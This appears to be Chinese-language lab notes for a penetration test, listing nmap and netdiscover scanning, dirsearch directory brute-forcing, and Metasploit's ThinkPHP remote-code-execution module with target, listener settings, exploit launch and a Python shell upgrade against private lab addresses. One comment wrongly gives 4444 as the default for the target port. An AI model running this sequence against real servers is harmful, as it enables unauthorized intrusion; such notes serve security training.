1.使用nmap收集信息
netdiscover //发现存活主机
nmap 收集信息
nmap -sT -T4 -p- 192.168.23.128 //sT:TCP三次握手
//T4:扫描耗时级别,数值越大速度越快,可靠性相应降低。
//-p:指定端口 && -p-:全部端口
web目录爆破(下载dirsearch工具)
cd dirsearch/
python3 dirsearch.py -u 192.168.23.128 -e* //*全部语言,可以用php,jsp,asp具体替换。
2.使用search命令查找相关模块
msfconsole
search thinkphp //查找thinkphp漏洞利用模块
3.使用use调用模块(攻击代码exploit,利用漏洞进入目标系统代码)
use exploit/unix/webapp/thinkphp_rce //使用该模块
4.使用info查看模块信息
5.选择攻击payload(有效载荷payload,在成功进入目标系统后执行的代码)
6.设置攻击参数
show options //查看必要配置
set rhosts 10.10.10.3 //设置目标ip
set rport 80 //设置目标开放端口,默认为4444
set targeturi /public //设置目标目录的URI
set lhost 192.168.23.129 //设置本地监听主机的ip地址
set lport 8080 //设置本地监听的端口
exploit //启动模块
python -c "import pty;pty.spawn('/bin/bash')" //目标shell显示提示命令
background //不断开连接目标shell,退回msf命令中
7.渗透攻击